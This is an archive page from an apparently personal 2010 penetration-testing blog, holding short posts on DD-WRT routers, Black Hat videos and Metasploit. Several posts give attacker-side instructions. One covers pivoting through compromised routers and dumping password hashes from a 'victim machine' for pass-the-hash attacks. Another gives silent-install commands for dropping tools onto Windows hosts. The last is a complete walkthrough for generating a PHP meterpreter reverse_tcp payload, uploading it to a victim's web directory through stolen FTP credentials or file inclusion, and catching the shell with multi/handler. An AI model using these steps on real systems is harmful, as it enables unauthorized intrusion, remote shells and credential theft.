Archive for 2010

“DD-WRT, I Know Where You Live”

by on Dec.27, 2010, under Posts

http://www.devttys0.com/2010/12/dd-wrt-i-know-where-you-live/

I thought this was rather interesting due to the fact that I work with DD-WRT routers on a pretty regular basis.

Leave a Comment :, , , , , , , , , , , , , , , more...

An update: Just a bunch of random thoughts

by on Oct.15, 2010, under Uncategorized

Things I’ve taken note of over the past months:

1.) Finding ‘too much information’ (even when it’s public information) on a company can scare HR people, go figure.

2.) Linksys routers that are compatible with DD-WRT or the like, are great for being used as pivot points in networks. For example, if you’re able to to gain access to a router that is DD-WRT compatible and you can get SSH up and running on it, you’ve opened up a lot of opportunities.

One opportunity would include scanning the internet network using proxychains and nmap over an SSH tunnel. You could also use proxychains and nikto to scan web servers that are in the associated network with the DD-WRT compatible router.

You can also setup a private second WLAN network on the DD-WRT compatible router to have a sense of secure access to the network you’re penetrating. Using DD-WRT as a penetration tester, really opens up your possibilities.

3.) http://ipq.co rocks, ‘nough said. 🙂

4.) Being able to boot up a live Linux distro on a victim machine, use bhive, samdump2 (like this tutorial http://www.irongeek.com/i.php?page=security/localsamcrack2), to extract password hashes and then do ‘Pass the hash attacks’ via metasploit (like shown here: http://securitytube.net/Metasploit-Megaprimer-Part-16-(Pass-the-Hash-Attack)-video.aspx) is incredibly cool.

5.) The Nmap scripting engine rocks: http://securitytube.net/Mastering-the-Nmap-Scripting-Engine-(Blackhat-2010)-video.aspx

6.) Did you know you could install Nmap silently on a Windows machine? (Yes, it will also install winpcap.)
nmap-5.35DC1-setup.exe /S

7.) Other cool apps to install ‘silently’ using msiexec on Windows machines:  (msiexec /i appname.msi /q)
http://www.python.org/download/releases/2.5/
http://www.activestate.com/activeperl/downloads

8.) The concepts of SSH reverse connections and port forwarding make me elated: http://www.securitytube.net/Hacking-through-the-Windows-Firewall-using-Metasploit-video.aspx

More to come as usual…

1 Comment :, , , , , , , , , more...

Blackhat 2010 Videos

by on Aug.24, 2010, under Posts, Videos

If there are any of you out there on the internet who are regularly reading my website, you may have noticed I haven’t updated in a while and this has been due to the fact that I’ve been busy with work and other aspects of life.

I still have projects in mind that I’m working on that I’d like to post but I haven’t made the time for them.

Without further ado, here are some links to videos of this years premier Blackhat 2010 Las Vegas security conference:

http://www.securitytube.net/Wardriving-the-Smart-Grid-(Blackhat-2010)-video.aspx

http://www.securitytube.net/SCADA-and-ICS-for-Security-Experts-(Blackhat-2010)-video.aspx

http://www.securitytube.net/Offensive-Python-for-Web-Hackers-(Blackhat)-video.aspx

http://www.securitytube.net/Jackpotting-Automated-Teller-Machines-Redux-(Blackhat-2010)-video.aspx

http://media.blackhat.com/bh-us-10/video/Keynote2/BlackHat-USA-2010-Keynote-Hayden.m4v

6 Comments :, , , , , , , , , more...

Mutillidae/Samurai WTF/OWASP Top 10

by on Jul.13, 2010, under Posts, Videos

Mutillidae/Samurai WTF/OWASP Top 10 from Adrian Crenshaw on Vimeo.

http://www.irongeek.com/i.php?page=videos/mutillidae-samurai-wtf-owasp-10

Leave a Comment :, , more...

PHP meterpreter payload

by on Jul.03, 2010, under Posts

Today I’ll be showing a new feature that has just been added to the Metasploit framework.

http://blog.metasploit.com/2010/06/meterpreter-for-pwned-home-pages.html

When one can upload files to a www directory and want further leverage on the system, they may want to do this via PHP in some way. PHP shells are a viable solution for this problem, if certain parameters are met.

One parameter that must be met, is that the server must allow system commands through PHP. If the server permits system commands through PHP, then a PHP shell will be a great tool for further assessment and possible privilege escalation.

If you surf around on the internet looking for PHP shells, you’ll find ones such as: c99.php, DXshell.php. Honestly, check out: php-shell.org

Now as part of the Metasploit framework, pentesters can now use meterpreter as a php payload. I will run through a quick example of how to create a meterpreter php payload and how to execute it:

msfpayload php/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 R > mypayload.php

With this file you can use it on the web server to get a reverse connection. Hopefully, you have gained some sort of write access to the www directory on the victim’s website. (For example, if you were to sniff / capture ftp credentials to the victim’s website). Other scenarios for gaining access to the system, may include local or remote file inclusion.

On the attacker’s end all you have to do is setup msfconsole and use the multi/handler. The following commands should be issued:

msf >use multi/handler
msf >set PAYLOAD php/meterpreter/reverse_tcp
msf >set LHOST 127.0.0.1
msf >set LPORT 4444
msf >exploit -z -j

All the attacker needs to do now, is simply visit to page http://victim.com/mypayload.php and ideally the attacker should be able to get a meterpreter session.

More to come as usual…

8 Comments :, , , , , , , more...

Looking for something?

Use the form below to search the site:

Still not finding what you're looking for? Drop a comment on a post or contact us so we can take care of it!